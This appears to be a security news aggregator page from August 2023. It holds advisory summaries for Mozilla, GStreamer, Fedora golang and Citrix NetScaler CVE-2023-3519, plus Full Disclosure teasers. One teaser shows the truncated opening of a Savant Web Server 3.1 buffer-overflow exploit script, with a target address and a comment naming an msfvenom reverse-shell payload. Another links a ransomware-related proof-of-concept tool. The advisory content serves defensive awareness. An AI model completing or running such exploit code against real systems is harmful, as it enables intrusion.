Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.

Mozilla Firefox is a web browser used to access the Internet.
Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations.
Mozilla Thunderbird is an email client.

Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Read More

Posted by Martin Heiland via Fulldisclosure on Aug 02

Dear subscribers,

We’re sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those
vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at YesWeHack.

This advisory has also been published at https://documentation.open-xchange.com/security/advisories/.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH

Internal reference: OXUIB-2282
Type:…

Read More

Posted by malvuln on Aug 02

RansomLord is a proof-of-concept tool that automates the creation of PE
files, used to compromise Ransomware pre-encryption.

Lang: C

SHA256: b0dfa2377d7100949de276660118bbf21fa4e56a4a196db15f5fb344a5da33ee

Video PoC:
https://www.youtube.com/watch?v=_Ho0bpeJWqI

Download: https://github.com/malvuln/RansomLord

RansomLord generated PE files are saved to disk in the x32 or x64
directorys where the program is run from.

Goal is to exploit code…

Read More

Posted by Mahmoud Noureldin on Aug 02

This is an old app but in an easy way which not the same which in public.

Exploit Title: Savant Web Server 3.1 – Remote Buffer Overflow (Egghunter)

# Date: [30/07/2023]
# Exploit Author: [0xBOF90]
# Vendor Homepage: [link]
# Version: [app version] (3.1)
# Tested on: [Windows 10]

import socket
import sys

try:
server = b”192.168.56.102″
#x00x0ax0dx25
port = 80
size = 253
# msfvenom -p windows/shell_reverse_tcp…

Read More

It was discovered that GStreamer Good Plugins incorrectly handled certain
FLAC image tags. A remote attacker could use this issue to cause GStreamer
Good Plugins to crash, resulting in a denial of service, or possibly
execute arbitrary code. (CVE-2023-37327)

Read More

It was discovered that GStreamer Base Plugins incorrectly handled certain
FLAC image tags. A remote attacker could use this issue to cause GStreamer
Base Plugins to crash, resulting in a denial of service, or possibly
execute arbitrary code. (CVE-2023-37327)

It was discovered that GStreamer Base Plugins incorrectly handled certain
subtitles. A remote attacker could use this issue to cause GStreamer Base
Plugins to crash, resulting in a denial of service, or possibly execute
arbitrary code. (CVE-2023-37328)

Read More

FEDORA-2023-1819dc9854

Packages in this update:

golang-1.19.12-1.fc37

Update description:

This update includes a security fix to the crypto/tls package, as well as bug fixes to the assembler and the compiler.

This update includes a security fix to the net/http package, as well as bug fixes to the compiler, cgo, the cover tool, the go command, the runtime, and the crypto/ecdsa, go/build, go/printer, net/mail, and text/template packages.

Read More

FEDORA-2023-a6c1ad5860

Packages in this update:

golang-1.20.7-1.fc38

Update description:

This update includes a security fix to the crypto/tls package, as well as bug fixes to the assembler and the compiler.

Read More

What is Citrix NetScaler ADC and NetScaler Gateway?

Citrix NetScaler ADC, previously known as Citrix ADC, is an Application Delivery Controller (ADC) designed to achieve secure and optimized network traffic.

Citrix NetScaler Gateway, previously known as Citrix Gateway, is an SSL-VPN solution designed to provide secure and optimized remote access.

What is the Attack?

According to the advisory published by Citrix, CVE-2023-3519 is an unauthenticated remote code execution vulnerability that affects the unmitigated Citrix NetScaler ADC and NetScaler Gateway products.

To be vulnerable, those products must be configured as a gateway or as an authentication, authorization and auditing (AAA) virtual server. The advisory also states that Citrix managed servers are already mitigated and no action is required.

Why is this Significant?

This is significant because the Citrix advisory acknowledged that CVE-2023-3519 was exploited in the wild. Also, CISA added the vulnerability to the Known Exploited Vulnerabilities Catalog on July 19th, 2023. CISA released an advisory on July 20th stating that the vulnerability was exploited as a zero-day in June affecting an unnamed critical infrastructure organization.

FortiGuard Labs advises users to install the relevant updated version of NetScaler ADC and NetScaler as soon as possible.

What is the Vendor Solution?

Citrix released relevant updates on July 18th, 2023.

What FortiGuard Coverage is available?

FortiGuard Labs has an IPS signature “Citrix.NetScaler.ADC.Gateway.Remote.Code.Execution (default action is set to “pass”) in place for CVE-2023-3519.

FortiGuard Labs advises users to install the relevant updated version of NetScaler ADC and NetScaler as soon as possible.

Read More